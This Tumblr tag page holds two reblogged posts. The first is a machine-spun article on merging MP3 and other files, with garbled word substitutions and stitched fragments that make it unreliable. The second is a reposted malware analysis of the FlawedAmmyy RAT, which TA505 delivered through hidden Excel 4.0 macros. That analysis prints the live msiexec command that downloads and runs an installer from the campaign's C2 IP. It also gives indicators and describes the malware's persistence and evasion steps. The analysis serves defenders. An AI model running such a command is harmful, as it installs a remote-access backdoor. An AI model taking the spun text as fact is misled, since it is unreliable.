#Google doc merge cell commande | Explore Tumblr posts and blogs

thaddavenport47-blog · 6 years ago

Text

Is There A Means To Merge Tracks?

You would wish one other program to mix MP3s. A person cannot be merged with an organization If the profiles represent the identical entity, edit the profiles in order that they're the identical sort of report. Do you may have one, or merge MP3s more, information you want to merge together? If that's the case, there are many programs obtainable for Windows 10, and different platforms, that allow you to hitch varied file codecs collectively. That is how you can merge MP3s, video information, PDFs (Portable Document Format) and txt textual content information collectively in Windows 10.

View detailed information about MP3 information to be merged, merge mp3s including MPEG header info and ID3v1 and ID3v2 info Select to make use of ID3 tag from any of the recordsdata to be merged to write into the target file Display an image embedded into the MP3 recordsdata Play MP3 files from the record to be merged. Yes! The Merge MP3 download for PC works on most present Home windows working programs. Premiere Pro supplies a method for synchronizing audio and video referred to as Merge Clips. This operate streamlines the process by which customers can sync audio and video which have been recorded individually (a process sometimes called double-system recording). You'll be able to choose a video clip and sync it with as much as sixteen channels of audio by utilizing the Merge Clips command. Clips which make up the merged clip are referred to as component clips. Observe that this tool is accessible solely in the Leads, Accounts, Contacts and Distributors modules and you may merge a maximum of three data at a time. You can use MP3 Toolkit to transform audio for cell units, make ringtones, repair tag data, rip Audio CD, report sound or merge audio pieces to an entire MP3 file. To save lots of time and keep away from any trouble, www.mergemp3.com listed below are three of the finest methods to merge audio information into one. All of these three methods carry out effectively, but a distinct device is used for every one among them. Take a look at these methods as I focus on them beneath, and choose probably the most appropriate one for yourself. Merge Information is an independent record label based in Durham, NC. Based in 1989 by Mac McCaughan and Laura Ballance, Merge Data celebrated its 20th anniversary in 2009. Superchunk's McCaughan and Ballance started Merge as a technique to launch their very own music and the music of their mates. Merge Records has grown from a gaggle of associates assembling 7"s in Ballance's bed room to change into one of the influential independent file labels in the country, releasing the work of artists such as: The Magnetic Fields, Neutral Milk Hotel, Lambchop, Spoon, M. Ward, Arcade Hearth, Caribou, She & Him, Superchunk and lots of more.

for merging tracks, Locus use very simple inner logic. it sorts all tracks you need to merge, by create time of the first level. Because of this, tracks must be related so as, they had been recorded. MP3 File Merge is a quite simple and intuitive software that allows you to create playlists from your MP3 information, and then mix them into one steady file. To merge audio information into one, all you have to do is to hit Add tracks button and browse for the audio tracks that you wish to work on. Once the MP3 files are loaded to the browser, choose the portion that you just want to merge, after which click on Join button. When it completed, you'll be able to download it to your laborious drive. A number of software program options for sharing the duty of growing a doc are available, akin to Google Docs, SharePoint shared paperwork, and others. The concept of merging identifiable advised modifications has only been explored by our workplace inside Microsoft Word. Moreover, it ought to be noted that the identification of the recommended revision is dependent upon the title that seems throughout the document properties of every doc included within the merge. Try Audacity. It is free and means that you can edit MP3s in numerous ways. It will allow you to create a third MP3 from two files so you'll be able to you've your merged file without permanantly altering the originals.

On-line Audio Merger is targeted at linking quite a lot of tracks collectively and consolidate them in a single observe. It incorporates a cross fading software and enables all well-known file sorts like mp3, m4a, wav, etc. Excessive 5 MP3 Merger to Merge MP3 Audios On-line or Offline. MP3 is essentially the most effectively-liked music format which could be performed on diverse transportable gadgets, like iPhone, Android cellphone and tablets, and so on. On the left of the window is a folder hierarchy that you can browse to select MP3s to merge together. Click on a folder there that features the MP3s you wish to merge collectively. Then press the Join the recordsdata within the checklist button to merge all of the MP3s within the chosen folder collectively.The Merger permits you to take a number of audio information, rearrange them in regardless of order you want, then export it as a single blended audio file. That way, I on no account should open GarageBand or each different multi-monitor audio software program. You can minimize audio recordsdata into MP3 or combine completely different MP3 into one file with ease. So that they launched Merge. Right this moment, starting a small label can be as simple as firing up the laptop; pressing "Document"; burning CDs after which posting samples on MySpace. However 20 years ago, the method was a little extra mysterious.It's also possible to flatten a take folder and merge the outcomes. The take folder is changed with a single area that represents the current comp choices. All take region sections not used within the current comp are deleted. The document marked because the Main File serves because the goal file; data from other duplicates is merged into this record. To designate a different record as the primary file, choose the Main Report option for that record. Use the Merge Data component so as to add complete new data to an information domain, or so as to add new assignments to present information.You too can merge a wide range of audio file codecs with this software a lot the same. Press the Audio button to decide on a number of music information to merge collectively. You'll be able to select to merge WAV, WMA, AC3, M4A and different audio file codecs. Then click on Convert on the menu bar as before, and select a format for the merged file. The less than 1 meg obtain onto my Vista field is a zipper file containing 2 information: One for iTunes, and one for the featured Merge MP3 program. I used solely the latter.

1 note · View note

terabitweb · 6 years ago

Text

Original Post from Security Affairs Author: Pierluigi Paganini

SI-LAB captured a piece of the FlawedAmmyy malware that leverages undetected XLM macros as an Infection Vehicle to compromise user’s devices.

In February 2019, SI-LAB captured multiple samples of phishing campaigns using an Office Excel document carrying a malicious Excel 4.0 macro, also known as XLM macro, and used to download and execute a final backdoor called FlawedAmmyy Remote Access Trojan (RAT).

XLM macros have been released for more than 20 years and are often used to make macro viruses. Today, Microsoft is using VBA macros (Visual Basic for Applications) instead of Excel 4.0 macro technology. This leads to XLM macros not being well known to the public. This technology is stored in the Workbook OLE stream in Excel 97-2003 format which makes it very difficult to detect and parse by antivirus (AV) engines.

SI-LAB has observed that Threat Actor (TA) 505 is now spreading the infamous FlawedAmmyy remote control backdoor using an old technique that is evading AV detection. The threat is only detected later when an MSI file (Windows installer) drops and execute the first infection stage of the malware.

As usual, threat actors are leveraging malscam campaigns as an attack vector to distribute the RAT. This malware is not new and it was used in past waves by TA505, a group known for sending large-scale Dridex, Locky, and GlobeImposter campaigns, among others.

The RAT is based on a leaked source code of the Ammyy Admin remote desktop software, and its features include remote desktop control, file system manager, proxy support and audio chat.

This piece of malware gives attackers full access to the victim’s device, allowing them to steal files, credentials, collect screenshots and access the camera and microphone. It also provides a backdoor for an attacker to move laterally through the network, serving as a potential entry point for a major supply chain attack.

After the Excel document is opened (xls file), the content it displays will lure the user to execute malicious Excel 4.0 macro code.

Malicious XLM macro code is located within a hidden form to avoid the attention of the victims. The name of the hidden form is written in Russian language: Макрос1 — Macro 1, in English.

The macro makes several string concatenations and executes via a pivot msiexec.exeprocess. This is part of a giant list of Living off the Land (LOL) techniques that attackers employ to mask their activities from runtime endpoint security monitoring tools such as AVs.

msiexec.exe process downloads an MSI installer that drops the first stage of the malware. This executable is simply a downloader for the next stage the malware (wsus.exe — the FlawedAmmyy itself).

TA505 group is using now a new entity to sign its malware denominated “AlCOHOL LTD”, with the following email associated: NastasyaTurkina68@mail[.]ru.

The C2 server used by crooks is now offline. It was available at 195.123.209.169, a server geolocated in Latvia with ports 80 and 3389 opened. The first port is used to maintain communications between C2 and clients. The last one, an RDP service, is probably used by crooks to manage C2 server.

Users who receive emails with xls files attached should be aware as that files can be an undetected vehicle spreading any kind of malware.

The author behind these campaigns (TA505) has utilized several types of Microsoft Office file formats (.doc and .xlm) to evade antivirus detection and bypass spam filters as well.

Infection is dependent on the victim allowing the macro to run. Users should ensure that macros are disabled in their Microsoft Office applications.

For more details on this finding see the Technical Analysis below.

Technical Analysis

File name: patent-2019-02-20T093A283A05-1.xls MD5: d490573977cc6b42ba0b4325df953a7f SHA1: dacf34580c09f7b1e4b8ba02f3ab8b6be08d03ab Creation date: 2018-12-19 10:42:12 First submission in VT: 2019-02-19 23:16:29

During February 2019, SI-LAB has registered multiple samples of phishing campaigns using Microsoft Office documents, namely .xls and .doc versions, used to download and execute a final backdoor called Flawedammyy RAT.

This threat has been closely observed by researchers from Proofpoint that discovered the RAT used since the beginning of 2016 in targeted phishing campaigns as well as massive, multi-million message campaigns.

The Threat Actor (TA) behind these attacks is known as TA505, a group responsible for sending large-scale Dridex, Locky, and GlobeImposter campaigns, among others, over the last four years.

At first glance, we analyzed a .xls document with an XLM macro (Excel 4.0 macro) embedded that is not detectable by AV engines.

Figure 1: Malicious xls file with an embedded XLM macro not detected by Virus Total.

Over the last days, several waves are disseminating this malware via email with .xls and .doc Microsoft Office documents attached. Phishing is, in fact, the major attack vector to distribute threats this nature in-the-wild.

The xls sample was submitted onto the Virus Total but no detections were noted. However, by looking into the file strings it was possible to identify some suspicious instructions.

Figure 2: Suspicious strings hardcoded in the xls file.

The command highlighted in Figure 2 is an instruction responsible to download an MSI file from the C2 server (hxxp://195.123.209.169/control), geolocated in Latvia and with ports 80 and 3389 opened to the Internet.

Figure 3: [1] Suspicious Microsoft Office files and C2 server IP address; and [2], geolocation and C2 ports.

In detail, the xls file acts as a downloader/installer using the msiexec.exe process as a pivot to download; in a headless mode; the new malicious file (MSI). That file has inside it another file, the first stage of the malware itself. That malware is known as FlawedAmmyy RAT and was discovered by Proofpoint researchers in March 2018.

Let’s investigate the XLM macro inside the Excel file

At first glance, the xls file seems legitimate as it is not classified as suspicious on VT. Nonetheless, as shown, some interesting strings were identified.

No VBA macros were observed inside the document which immediately raised the suspicion that it could be a new threat.

Figure 4: No VBA macros were detected.

An important point to note in “Root Entry” is the version of the document “Microsoft Excel 97-2003“. So, we are facing a living off the land technique, probably, XLM macros — an old technology that makes harder its intent and detection.

Figure 5: Microsoft Excel 97-2003 version identified.

Next image presents when the file is opened. Notice that macros are disabled by default and the document trigger a message to the user enable the execution of macros.

Figure 6: XLS document and the request to enable macro execution.

As shown in Figure 6, this file has only a visible sheet, and probably, a hidden sheet is also part of this document where an XLM macro is embedded as well.

As observed below and according to Google Translate technology, it was possible to detect that the sheet name is defined in the Ukrainian language.

Figure 7: Language used by crooks to name the visible xls sheet.

A deeper dive

XLS is a Compound Document File (CDF or CF) or Object Linking and Embedding (OLE) File.OLE files are hierarchical data structures that have several storages and streams (in contrast to folders and files in an operating system).

Figure 8 below shows the structure of the xls file. In this file, the Workbook stream is interesting as it contains all the information related to that workbook such as the included sheets.

The structure of this stream is fully specified in Microsoft Office Excel 97-2007 – Binary File Format Specification. We can see that the malicious string is:

msiexec.exe RETURN=185 /i http://195.123.209.169/control /q ksw=’%TEMP%’

Figure 8: Suspicious string hardcoded in the Workbook structure of the xls file.

The msiexec.exe is one of several Living off the Land (LOL) techniques that crooks are using to mask suspicious activity from endpoint security tools such as antivirus. The Windows Installer technology (MSI) uses msiexec.exe for installing MSI and MSP packages.

See more about msiexec.exe and its parameters here.

Next, we’ll take a deeper look at the Workbook stream, which is in the BIFF8 format.

As it is depicted in Figure 9 (merge of 3 images), the msiexec command is found inside a Cell String (207h) record, part of the value of a formula.

Figure 9: Identification of the malicious string inside xls file (BIFF structure).

Now, we need to determine the sheet that contains this particular cell string. According to the XLM Spec, all information about a sheet such as its name, type, and stream position are kept within a BOUNDSHEET record (85h).

In Figure 10, we can see that this workbook has two BOUNDSHEET records; which means it has two sheets. However, one of them must be hidden as we can only see one sheet in Figure 6.

Figure 10: BOUNDSHEET records in the Workbook; representing two sheets.

Fig 11. Option flags in BOUNDSHEET record.

The first sheet starts at offset 0x017303 and the second one at offset 0x01781C. The cell formula that we are interested in is located in the hidden sheet.

We can unhide the sheet by either setting the hidden state to zero within the file or changing the setting through the Excel interface. It is interesting to note that the hidden state can also be set to 2; which is called very hidden state. Very hidden sheets cannot be unhidden through the Excel interface, they can only be toggled to visible via manual hex editing of the file. After unhiding the macro sheet, we can see the embedded macro clearly in the Excel GUI.

Figure 12: Hidden sheet with an XLM macro coded.

This macro is triggered when the document is opened; Auto_Open label points to cell A1.Next, the user is asked to enable active content, and then the msiexec and subsequent chain of events are automatically executed.

As mentioned earlier, XLM macros are an arcane technology that predates VBA (introduced in Excel 5.0).

By analyzing the macro code, it is only performed a concatenation process that results in a final string that will use to download an MSI file from the C2 server.

msiexec.exe RETURN=185 /i http://195.123.209.169/control /q ksw=’%TEMP%’

We can see that the concatenation process is executed step-by-step, and several system calls are performed.

Figure 13: Concatenation process that produces the final command to download the MSI installer/dropper.

In detail, the EXEC function can be used to create processes, and using the REGISTER and CALL functions, attackers can use XLM macros to access the Win32 API. Shellcode injection is a major risk associated with XLM macros, leading to hard to detect in-memory attacks and various types of exploits and zero-day viruses being launched on the target system.

HALT() function stops all macros from running. Use HALT instead of RETURN to prevent a macro from returning to the macro that called it.

See more about macro commands here.

Finally, we can observe that thee msiexec.exe is executed and the MSI file is downloaded from the C2 server.

Figure 14: msiexec.exe is executed and MSI malicious file is downloaded from the C2 server.

However, as already mentioned at the beginning of the technical analysis, SI-LAB team obtained two types of files, namely xls and doc archives. The doc file works on the same way, however, it holds a VBA macro that runs the entire process in order to build the command to download the MSI file from the malicious C2 server.

Another document used by TA505 to spread FlawedAmmyy (.doc)

File name: 68131_46_20190219.doc MD5: 4cc5de3d2bddd7c89311fccf3d1b51d9 SHA1: 1fcbac66183b2d7f4d81821a8f7210ce188f371b Creation time: 2019-02-19 22:57:00 First submition on VT: 2019-02-20 02:01:28

During this investigation, another sample was obtained. TA505 group has used .doc documents with embedded VBA macros to infect user’s devices as well.

Figure 15: Macro VBA detected in .doc document.

We can observe this document is a Microsoft Office Word created on February 19th.

Figure 16: File version and creation date.

As observed in Figure 17, the same image is presented in this version. Macros are also disabled, and a message is displayed to lure the victim to enable macros execution.

Figure 17: .doc file requesting macro execution.

In addition, when the macros are enabled a new process is promptly created; the msiexec.exe that downloads the MSI file from C2 server (similar to the xls version).

Let’s look at Figure 18, here another trick is used by crooks. When the doc file is executed, the file itself is closed if some error are triggered, or in contrast; the windows calculator.exeis opened in a well-succeeded execution.

Figure 18: msiexec.exe is executed in the .doc version.

The VBA code inside .doc file is presented in the following image (please, click to enlarge).

Figure 19: VBA macro embedded in doc file (click here to enlarge).

After the execution of the msiexec.exe command, the MSI installer/dropper is downloaded (this behavior is valid in both Office documents).

Figure 20: Network traffic when MSI dropper is downloaded.

Analyzing the MSI file – The installer/dropper of infamous FlawedAmmyy

File name: control MD5: c4463d6ae741d4fb789bd0895fafebee SHA1: c8866ca1012dfabf5ad131cfeea0036dacb433e6 Creation time: 2012-09-21 09:56:09 First submission on VT: 2019-02-19 23:26:41

Looking inside the MSI file, we observed that it has appended a binary — the first stage of the FlawedAmmy, the backdoor.

Figure 20: Files that are part of MSI. A new binary is observed.

File name: Binary._D7D112F049BA1A655B5D9A1D0702DEE5 MD5: 2944eca03bc13b0edf064a619ec41459 SHA1: 83d215861c562315bca60994a901e06fc7cfa1a7 Imphash: 2dd21d66e59c2ee91baf838835ceef17 Creation time: 2019-02-19 19:46:06 First submission on VT: 2019-02-20 01:28:44

It is important to note this threat is recent and was identified as FlawedAmmy backdoor. This is a important indicator to corroborate our suspicions. Keep going!

Figure 21: FlawedAmmyy backdoor detection.

To corroborate our findings, we can observe some strings which demonstrate that the threat is, in fact, the infamous malware. AMMY is a kind of string found and coded in FlawedAmmyy samples. Also, the process wsus.exe consists of the second stage initiated later to create persistence in a vulnerable device. Both were identified as presented in Figure 22 below.

Figure 22: IOCs of FlawedAmmyy RAT.

Another important detail is the digital certificate. We can observe that malware is signed with a new entity never seen before in TA505 activities: “ALCOHOL LTD”. This binary was signed on Tuesday, February 19th, 2019, and the next email is also associated:[email protected]; from a Russian provider.

Figure 23: Digital certificate associated with the malware.

Based on this email, we found some threads on Twitter.

#TA505 Korean #maldoc xls -> msiexec -> #FlawedAmmyy RAT?https://t.co/jys9xM76ZXhttps://t.co/uqYAPeWSNm pic.twitter.com/Uh0HW5IgzD

— nao_sec (@nao_sec) February 27, 2019

FlawedAmmyy is composed of two infection stages. The first one is a dropper responsible to allocates virtual memory to a new candidate, to unpack a second stage (wsus.exe – FlawedAmmyy itself) and also to execute it later in memory.

Continuing this analysis, it’s important to note that the first stage executes a scan in the target machine looking for some executables. It validates the presence of some consumer based AV solutions, and if one is found, it continues with a different path. If these executables are found the malware terminates its process.

Figure 24: RAT validates the presence of some consumer based AV solutions.

The full list of programs it is seeking is the following.

Figure 25: Customer-based AV solutions.

If none of the referenced AV is found, it will drop a temp file. This temp file is the Ammyy RAT encrypted file, which will be decrypted and renamed at a later stage (wsus.exe).

During malware analysis, we noticed that some entries to avoid sandboxes and Virtual Machines are also performed.

Figure 26: Malware exits if is running inside a virtual environment.

Meanwhile, the malware launches the second stage: wsus.exe. This binary has a special function: create persistence in the system.

We can observe that the first stage builds the wsus.exe IAT (in this case it is building the Kernel32.dll library).

Figure 27: First stage of RAT builts IAT and load some libraries (kernel32.dll this case).

Now, the second stage is completed. Next, it tries to delete Settings, Microsoft\Enc, AMMYY, Foundation, and Foundation1 directories, also following files: wmihost.exe,settings3.bin, wmites.exe, wsus.exe from different directories. Clear all the vestiges of another infection can be the threat author intention.

Figure 28: RAT deletes some files and directories.

Soon afterwards, the malware validates if the user is an administrator in order to create persistence in the system. This is done through the instruction push 1; uMode depicted below.

Figure 29: Malware checks if the user is the administrator.

If the user is an admin, a new service in Windows Services is created (foundation); see offset 0x402A6B. Otherwise, it adds a new task in the Windows Task Scheduler (see offset 0x402AE7). Next, the service is started and initiated at the system startup of the operating system.

Figure 30: New service called foundation is created.

Figure 31: Service foundation created. It will execute wsus.exe binary as a service at startup.

As shown above, if the user has not an admin role, then a task is created in Windows Task Scheduler; look at offsets 0x402917 and 0x402928.

Figure 32: New task is created in offsets 0x402917 and 0x402928.

Figure 32: New task created in Windows Task Scheduler by malware.

At this point, the malware is installed in the target machine and became persistent.

During its execution on the infected machine, it communicates with the C2 server. One of the packets that RAT sends to C2 is the following. This information is composed by the name of the computer, domain, privileges and more (basically the standard Ammyy protocol).

Figure 33: FlawedAmmyy sends a packet to C2 with information about the infected machine.

More indicators for the RAT are matching the strings from the wsus.exe executable.

Figure 34: IOCs of FlawedAmmyy RAT present in wsus.exe.

Conclusion

The infamous FlawedAmmyy is alive and is being used by TA505 group to infect user’s devices. It’s interesting to note that the group behind these malscan campaigns is spreading the malware through Microsoft Office files to circumvent either antivirus detection and spam filters.

As shown, old XLM macros are still living off the land technique used by attacks to mask their detection and intent.

Initial infections occur when macros are enabled in the target system. Therefore, always ensure that you disable macros in your Microsoft Office applications.

Figure 35: How to disable macros on Microsoft Word.

On the other hand, XLM macros are probably more difficult to analyze by security products in contrast to VBA macros.

Microsoft is now using the Antimalware Scanning Interface (AMSI) with Office 365 for scanning VBA macros. Since XLM macros have nothing to do with the VBA engine, we suspected that XLM could be used to circumvent AMSI.

As a final consideration, it is interesting to observe that technology from 1992 can be used to circumvent the most recent Office security features.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.

[SI-LAB] FlawedAmmyy Leveraging Undetected XLM Macros as an Infection Vehicle

About the author Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog seguranca–informatica.pt.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199";

try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – FlawedAmmyy malware, hacking)

The post [SI-LAB] FlawedAmmyy Leveraging Undetected XLM Macros as an Infection Vehicle appeared first on Security Affairs.

Go to Source Author: Pierluigi Paganini [SI-LAB] FlawedAmmyy Leveraging Undetected XLM Macros as an Infection Vehicle Original Post from Security Affairs Author: Pierluigi Paganini SI-LAB captured a piece of the FlawedAmmyy malware that leverages undetected XLM macros as an Infection Vehicle to compromise user’s devices.

#Security Affairs blog

0 notes